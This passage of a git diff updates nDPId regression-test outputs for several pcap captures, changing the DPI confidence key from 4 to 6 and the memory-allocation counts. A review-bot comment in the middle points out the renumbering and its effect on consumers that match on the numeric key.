{"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":5906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054407576} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 
@@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5884180 bytes -~~ total memory freed........: 5884180 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6017814 bytes +~~ total memory freed........: 6017814 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1343 chars diff --git a/test/results/tls_verylong_certificate.pcap.out b/test/results/tls_verylong_certificate.pcap.out index 99ad7a0f8..d569b69da 100644 --- a/test/results/tls_verylong_certificate.pcap.out +++ b/test/results/tls_verylong_certificate.pcap.out 
@@ -4,10 +4,10 @@ 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} 
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,emai
l.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.
101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":48,"packets-processed":48,"total-skipped-flows":0,"total-l4-payload-len":19077,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1578254908551} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 48/48 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6043114 bytes -~~ total memory freed........: 6043114 bytes -~~ total allocations/frees...: 118299/118299 +~~ total memory allocated....: 6176748 bytes +~~ total memory freed........: 6176748 bytes +~~ total allocations/frees...: 121061/121061 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 480 chars ~~ json string max len.......: 3604 chars diff --git a/test/results/toca-boca.pcap.out b/test/results/toca-boca.pcap.out index 1ea6f281b..3033a4325 100644 --- a/test/results/toca-boca.pcap.out +++ b/test/results/toca-boca.pcap.out 
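Review bot: The key of `ndpi.confidence` changes from `{"4":"DPI"}` to `{"6":"DPI"}` on the `detected`, `detection-update` and `end` events of test/results/tls_verylong_certificate.pcap.out, while the label and every other flow field stay the same. The same renumbering shows up in the toca-boca.pcap.out hunk that follows. Presumably the confidence enum in the bumped libnDPI gained entries, so any consumer or detection rule that matches on the numeric key instead of the name would silently stop matching after this bump. The commit message only says "bump libnDPI"; I would add a line such as `ndpi.confidence id for "DPI" changes from 4 to 6; consumers should match on the name, not the id`.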
@@ -2,96 +2,96 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648999646082} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648999646082,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1648999646082,"pkt":"eJS0JASgYDjgxTWgCABFAABUT6gAAD8RuzzAqAJkW8dR4cP9E78AQBEY\/\/8AAQAAAAQitua6Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648999646116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1648999646116,"pkt":"YDjgxTWgeJS0JASgCABFAABoMqkAADsR3Cdbx1HhwKgCZBO\/w\/0AVAKWAAAAAn370YUitua6Af8AAAAAABQAAAAAAAAAAQAAAAQD\/wEAAAAALAAAAAC7yASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648999646128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1648999646128,"pkt":"eJS0JASgYDjgxTWgCABFAABxT6sAAD8RuxzAqAJkW8dR4cP9E78AXV\/iu8gAAgAAADIitua6Af8ABAAAABQAAAAAAAAAAH370YUGAAEEAAAANQAAAAHzAAEIHkEGAwBmMzYxNWExNy02MDg0LTQwYzUtYmZkNS0yZmZiYTRkMQ=="} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":1831,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1649338791869} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1649338791869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649338791869,"pkt":"eJS0JASgYDjgxTWgCABFAABUquwAAD8RF0nAqAJkXCaaMaQmE78AQOkN\/\/8AAQAAAA0lI+N2Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648999646082,"flow_last_seen":1648999648493,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648999646082,"flow_last_seen":1648999648493,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 